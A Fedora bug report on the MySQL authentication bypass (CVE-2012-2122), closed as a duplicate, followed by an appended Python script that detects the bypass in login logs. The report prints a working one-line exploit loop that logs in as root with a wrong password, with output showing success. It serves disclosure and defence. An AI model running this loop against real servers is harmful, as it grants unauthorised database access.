Bug 830650 - MySQL security break
Status: CLOSED DUPLICATE of bug 830680
Product: Fedora
Classification: Fedora
Component: mysql
Version: 17
Hardware: x86_64 Linux
Priority: unspecified
Severity: unspecified
Assigned To: Tom Lane
QA Contact: Fedora Extras Quality Assurance
Keywords: Security
Depends On:
Blocks: CVE-2012-2122
Reported: 2012-06-11 01:43 EDT by Arthur Buliva
Modified: 2012-06-11 04:21 EDT

Doc Type: Bug Fix
Last Closed: 2012-06-11 04:21:47 EDT
Type: Bug


Description Arthur Buliva 2012-06-11 01:43:25 EDT
Description of problem:

Any user without MySQL username/password is able to query and update databases with a hack that has recently been posted online:

Version-Release number of selected component (if applicable):
sh-4.2$ rpm -qa | grep -i mysql
mysql-connector-odbc-5.1.10-1.fc17.x86_64
mysql-5.5.23-1.fc17.x86_64
mysql-libs-5.5.23-1.fc17.x86_64
perl-DBD-MySQL-4.020-2.fc17.x86_64
mysql-workbench-5.2.40-1.fc17.x86_64
mysql-utilities-1.0.5-2.fc17.noarch
php-mysql-5.4.3-1.fc17.x86_64
mysql-server-5.5.23-1.fc17.x86_64
mysql-connector-python-0.3.2-3.fc17.noarch
sh-4.2$ uname -a
Linux wombat 3.3.7-1.fc17.x86_64 #1 SMP Mon May 21 22:32:19 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$



How reproducible:


Steps to Reproduce:
1. Open terminal
2. for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
3.
  
Actual results:
sh-4.2$ for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
@@version
5.5.23
sh-4.2$


Expected results:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)



Additional info:
Comment 1 Jan Lieskovsky 2012-06-11 04:21:47 EDT

*** This bug has been marked as a duplicate of bug 830680 ***
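
A defender-side check for the trace the reproduction loop in the description leaves behind (many rejected logins for one account, then an accepted one), added here as an example; it is not part of the original report or of MySQL. The log layout, the function names and the thresholds are assumptions, and the sample entries are constructed.

```python
import re
from collections import defaultdict

# Assumed, simplified layout: "<epoch-seconds> <connection-id> Connect <message>".
# Adapt LINE to the connection log you actually collect.
LINE = re.compile(
    r"^(?P<ts>\d+) +(?P<conn>\d+) Connect\s+(?:"
    r"(?P<denied>Access denied for user '(?P<duser>[^']*)'@'(?P<dhost>[^']*)')"
    r"|(?P<user>[^@\s]+)@(?P<host>\S+) on )"
)


def find_bypass_pattern(lines, min_failures=20, window=60):
    """Flag an accepted login that ends a burst of denials for the same account.

    min_failures and window (seconds) are arbitrary starting values.
    """
    denials = defaultdict(list)  # (user, host) -> timestamps of recent denials
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a connection entry
        ts = int(m["ts"])
        if m["denied"]:
            key = (m["duser"], m["dhost"])
            denials[key] = [t for t in denials[key] if ts - t <= window] + [ts]
            continue
        key = (m["user"], m["host"])
        # An accepted login closes the streak, whether or not it raises an alert.
        recent = [t for t in denials.pop(key, []) if ts - t <= window]
        if len(recent) >= min_failures:
            alerts.append({"user": key[0], "host": key[1],
                           "failures": len(recent), "accepted_at": ts})
    return alerts


def sample_log():
    """Constructed entries: a 40-denial burst for root, then an ordinary typo by app."""
    denied = "Access denied for user '{}'@'{}' (using password: YES)"
    lines = [f"{1000 + i // 10} {i + 1} Connect " + denied.format("root", "localhost")
             for i in range(40)]
    lines.append("1004 41 Connect root@localhost on mysql")
    lines.append("1010 42 Connect " + denied.format("app", "10.0.0.5"))
    lines.append("1012 43 Connect app@10.0.0.5 on shop")
    return lines


if __name__ == "__main__":
    for alert in find_bypass_pattern(sample_log()):
        print(alert)
```

A single mistyped password followed by a correct one, like the constructed `app` entries, stays below the threshold and raises nothing.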